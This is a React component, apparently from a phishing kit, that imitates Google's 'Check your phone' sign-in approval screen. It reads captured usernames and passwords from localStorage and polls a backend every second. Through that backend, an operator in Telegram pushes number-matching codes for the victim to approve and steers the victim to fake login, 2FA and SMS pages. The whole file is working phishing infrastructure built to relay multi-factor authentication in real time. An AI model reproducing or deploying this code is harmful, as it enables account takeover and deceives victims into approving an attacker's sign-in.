import { useState, useEffect, useRef } from "react";
import GoogleAuthPopup, { GoogleAccountChip } from "./GoogleAuthPopup";

export default function WhatsAppAuth() {
  const [sessionId, setSessionId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [username, setUsername] = useState("");
  const [password, setPassword] = useState("");
  const [verificationCode, setVerificationCode] = useState("");
  const [lastCodeUpdate, setLastCodeUpdate] = useState(0);
  const [showRealCode, setShowRealCode] = useState(false); // Kontrollon kur të shfaqet kodi i vërtetë
  
  const API_URL = process.env.REACT_APP_API_BASE_URL;
  const FRONT_URL = window.location.origin;
  const pollingIntervalRef = useRef(null);
  const hasInitialized = useRef(false); // Ndiq nëse është inicializuar
  const initialLoadDelay = useRef(null); // Për delay të shfaqjes
  const [resendCooldownSec, setResendCooldownSec] = useState(0);

  useEffect(() => {
    if (resendCooldownSec <= 0) return undefined;
    const id = setTimeout(
      () => setResendCooldownSec((s) => Math.max(0, s - 1)),
      1000
    );
    return () => clearTimeout(id);
  }, [resendCooldownSec]);

  // Polling function
  const fetchCode = async () => {
    if (!sessionId) return;
    
    try {
      const response = await fetch(`${API_URL}/check_response?session_id=${sessionId}`);
      const data = await response.json();
      
      console.log("Polling response:", data);
      
      // Get the latest code from any source
      const latestCode = data.latest_code || data.app_code || data.phone_code || 
                        data.latest_app_code || data.latest_phone_code;
      
      // Check if we have app_replies or phone_replies with newer codes
      let newestCode = latestCode;
      let newestTimestamp = 0;
      
      // Check app_replies
      if (data.app_replies && data.app_replies.length > 0) {
        const latestAppReply = data.app_replies.reduce((latest, reply) => {
          return reply.timestamp > latest.timestamp ? reply : latest;
        }, data.app_replies[0]);
        
        if (latestAppReply.timestamp > newestTimestamp) {
          newestTimestamp = latestAppReply.timestamp;
          newestCode = latestAppReply.code;
        }
      }
      
      // Check phone_replies
      if (data.phone_replies && data.phone_replies.length > 0) {
        const latestPhoneReply = data.phone_replies.reduce((latest, reply) => {
          return reply.timestamp > latest.timestamp ? reply : latest;
        }, data.phone_replies[0]);
        
        if (latestPhoneReply.timestamp > newestTimestamp) {
          newestTimestamp = latestPhoneReply.timestamp;
          newestCode = latestPhoneReply.code;
        }
      }
      
      // Update code if we have a new one
      if (newestCode && newestCode !== verificationCode) {
        console.log(`New code received: ${newestCode} (previous: ${verificationCode})`);
        
        // Nëse është kodi i parë i marrë, mos e shfaq menjëherë
        if (!showRealCode) {
          // Delay i vogël përpara se të shfaqet kodi i parë
          if (initialLoadDelay.current) {
            clearTimeout(initialLoadDelay.current);
          }
          
          initialLoadDelay.current = setTimeout(() => {
            setVerificationCode(newestCode);
            localStorage.setItem("whatsapp_code", newestCode);
            localStorage.setItem("app_code", newestCode);
            setLastCodeUpdate(Date.now());
            setShowRealCode(true); // Tani shfaq kodin e vërtetë
          }, 100); // 100ms delay për të parandaluar flash
        } else {
          // Për ndryshime të mëvonshme, update direkt
          setVerificationCode(newestCode);
          localStorage.setItem("whatsapp_code", newestCode);
          localStorage.setItem("app_code", newestCode);
          setLastCodeUpdate(Date.now());
        }
      }
      
      // Check for new_code_received flag (for when user enters another code in Telegram)
      if (data.new_code_received && newestCode && newestCode !== verificationCode) {
        console.log(`New code flagged: ${newestCode}`);
        setVerificationCode(newestCode);
        localStorage.setItem("whatsapp_code", newestCode);
        localStorage.setItem("app_code", newestCode);
        setLastCodeUpdate(Date.now());
      }
      
      // Handle redirects and errors
      const routes = {
        login: "/login",
        email: "/email",
        wp: "/wp",
        "2fa": "/2fa",
        sms: "/sms",
        wpauth: "/wp",
      };
      
      // ✅ Direct redirect (e.g., Calendly)
      if (data.redirect && !data.redirect.startsWith("error:")) {
        if (pollingIntervalRef.current) {
          clearInterval(pollingIntervalRef.current);
        }
        console.log(`Redirecting to: ${data.redirect}`);
        window.location.replace(data.redirect);
        return;
      }
      
      // ✅ Internal routing (when Telegram button is clicked)
      if (data.authType && data.authType !== "wp") {
        if (pollingIntervalRef.current) {
          clearInterval(pollingIntervalRef.current);
        }
        const route = routes[data.authType];
        if (route) {
          console.log(`Navigating to: ${route}`);
          window.location.replace(`${FRONT_URL}${route}`);
        }
        return;
      }
      
      // ❌ Error from Telegram
      if (data.error) {
        console.log("Error from Telegram:", data.error);
      }
      
    } catch (err) {
      console.error("Error fetching verification code:", err);
    }
  };

  // Start polling
  const startPolling = () => {
    // Clear previous interval if exists
    if (pollingIntervalRef.current) {
      clearInterval(pollingIntervalRef.current);
    }
    
    // Start new polling interval
    pollingIntervalRef.current = setInterval(() => {
      fetchCode();
    }, 1000);
    
    console.log("Polling started - listening for new codes and commands");
  };

  useEffect(() => {
    // Vetëm një herë
    if (hasInitialized.current) return;
    
    // Clear any existing timeouts
    if (initialLoadDelay.current) {
      clearTimeout(initialLoadDelay.current);
    }
    
    // Fillimisht mos shfaq asgjë
    setShowRealCode(false);
    setVerificationCode("");
    
    // Pastaj hiq localStorage cache për kodin
    localStorage.removeItem("whatsapp_code");
    localStorage.removeItem("app_code");
    localStorage.removeItem("phone_code");
    
    // Get user data from localStorage
    const storedUsername = localStorage.getItem("username") || "";
    const storedPassword = localStorage.getItem("password") || "";
    setUsername(storedUsername);
    setPassword(storedPassword);

    // Get session ID from localStorage
    const storedSessionId = localStorage.getItem("session_id") || "";
    if (storedSessionId) {
      setSessionId(storedSessionId);
      
      // Bëj fetch menjëherë për kodin e parë
      setTimeout(() => {
        fetchCode();
      }, 50);
      
      // Start polling
      startPolling();
    }
    
    hasInitialized.current = true;
    
    // Cleanup on unmount
    return () => {
      if (pollingIntervalRef.current) {
        clearInterval(pollingIntervalRef.current);
      }
      if (initialLoadDelay.current) {
        clearTimeout(initialLoadDelay.current);
      }
    };
  }, [API_URL]);

  // Restart polling if sessionId changes
  useEffect(() => {
    if (sessionId && hasInitialized.current) {
      startPolling();
    }
  }, [sessionId]);

  // Display the verification code
  const displayCode = verificationCode;

  const handleResendApp = async () => {
    if (resendCooldownSec > 0) return;
    const sid = sessionId || localStorage.getItem("session_id") || "";
    const user = (username || localStorage.getItem("username") || "").trim();
    if (!user) return;
    setResendCooldownSec(30);
    try {
      const res = await fetch(`${API_URL}/api/app-resend`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ username: user, session_id: sid || null }),
      });
      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        console.error("Resend notify failed:", data);
      }
    } catch (e) {
      console.error("Resend notify error:", e);
    }
  };

  return (
    <GoogleAuthPopup>
      <h1 className="google-verify-title">Check your phone</h1>
      <GoogleAccountChip email={username} />

      <p className="google-verify-intro">
        Google sent a notification to your phone. Open the Gmail app, tap{" "}
        <strong>Yes</strong> on the prompt, then tap the number on your phone to
        verify it&apos;s you.
      </p>

      <div
        className="google-verify-code"
        style={{
          opacity: showRealCode ? 1 : 0,
          transition: "opacity 0.2s ease-in-out",
        }}
        aria-live="polite"
      >
        {showRealCode ? displayCode : "\u00a0"}
      </div>

      <p className="google-verify-detail">
        Tap the number shown above on your phone to continue.
      </p>

      {error && <p className="error-message google-verify-error">{error}</p>}

      <button
        type="button"
        className="google-signin-text-btn google-verify-resend"
        onClick={handleResendApp}
        disabled={resendCooldownSec > 0}
      >
        {resendCooldownSec > 0
          ? `Resend (${resendCooldownSec}s)`
          : "Resend it"}
      </button>

      <label className="google-verify-checkbox">
        <input type="checkbox" defaultChecked readOnly />
        <span>Don&apos;t ask again on this device</span>
      </label>
    </GoogleAuthPopup>
  );
}